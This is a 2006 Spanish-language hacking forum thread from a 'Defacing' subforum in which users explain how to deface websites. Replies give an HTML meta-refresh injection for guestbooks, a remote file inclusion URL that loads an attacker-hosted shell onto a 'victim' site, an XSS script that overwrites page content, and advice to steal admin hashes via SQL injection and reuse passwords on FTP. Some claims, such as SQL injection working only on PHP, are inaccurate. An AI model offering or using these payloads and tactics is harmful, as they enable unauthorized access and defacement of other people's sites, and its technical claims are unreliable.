Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 19, 2008, 12:03:44
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema:  (Leído 381 veces)
K0rl3oN
Miembro
*****
Desconectado Desconectado

Mensajes: 141


Ver Perfil Email
« en: ſeptiembre 23, 2006, 12:50:28 »
En línea
..::Zodiac::..
Si, soy un Criminal... Mi crimen Es la curiosidad...
Habitual
*****
Desconectado Desconectado

Mensajes: 354


Hacking Departament


Ver Perfil WWW
« Respuesta #1 en: ſeptiembre 23, 2006, 01:22:04 »
bueno, te respondo la 1ra pregunta poq las otras 2 las puedes encontrar en google...

de toy un ejemplo de injeccion de html, buscas en google una de estas paginas que tienen un libro de visitas, que tenga activado html, y le pones un <META HTTP-EQUIV="refresh" CONTENT="1; url=aqui pones la url del hack">

ahi te refresca la pagina, y te la redirecciona a la url que indicaste

espero q te sirva de ayuda

bytes
En línea
OSheaBinario
Habitual
*****
Desconectado Desconectado

Mensajes: 364


Te das cuenta de lo que tenes, cuando lo perdes

pedimelo-por-mensaje-privado@hotmail.com
Ver Perfil Email
« Respuesta #2 en: ſeptiembre 23, 2006, 02:08:25 »
Las injecciones sql creo que solo son para php, te podes dar cuenta si una web es php, por si termina /index.php o si abajo de todo dice "powered by php ..etc.." las ijecciones de shell son
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.victima.com/index.php?page=www.tushell.com/index.txt


si me equiboco q alguien me lo diga

Bueno eso es todo lo q se,

Saludos,
OSheaBinario.
En línea

¿Queres paginas de Renders?
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Click Aqui
zickox
Visitante
« Respuesta #3 en: ſeptiembre 23, 2006, 07:38:17 »
con la sql inyection... no podras kambiar el index de la web... lo uniko ke podras hacer es obtener el hash del admin atravez de consultas a la base de datos..
y sobre las xss... puedes usar javascript para reemplazar el index ejemplo
<script>
document.documentElement.innerHTML="defaced by me";
</script>

pero todo depende de si tu xss es directa o inderecta, en este kaso deberia ser indirecta.

sobre como ser admin en ese tipo de foro.. debes scanear el foro.. o buskar bugs en
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.securityfocus.com
o
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.milw0rm.com


salu2
En línea
Sasuk3
Visitante
« Respuesta #4 en: ſeptiembre 23, 2006, 07:57:04 »
Cita de: zickox en ſeptiembre 23, 2006, 07:38:17
con la sql inyection... no podras kambiar el index de la web... lo uniko ke podras hacer es obtener el hash del admin atravez de consultas a la base de datos..
y sobre las xss... puedes usar javascript para reemplazar el index ejemplo
<script>
document.documentElement.innerHTML="defaced by me";
</script>

pero todo depende de si tu xss es directa o inderecta, en este kaso deberia ser indirecta.

sobre como ser admin en ese tipo de foro.. debes scanear el foro.. o buskar bugs en
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.securityfocus.com
o
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.milw0rm.com


salu2


La mayoria de veces el administrador usa la misma Clave y nombre para el FTP ... ya eh visto varios ejemplos Roll Eyes

Asi que si consiges pass.. ya sabes intentas entrar al FTP..^^ ahy si puedes cambiar el index.. salud0zzzzzz
En línea
ManCuerTex
Visitante
« Respuesta #5 en: ſeptiembre 27, 2006, 08:31:30 »
En línea
K0rl3oN
Miembro
*****
Desconectado Desconectado

Mensajes: 141


Ver Perfil Email
« Respuesta #6 en: ſeptiembre 27, 2006, 11:00:03 »
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC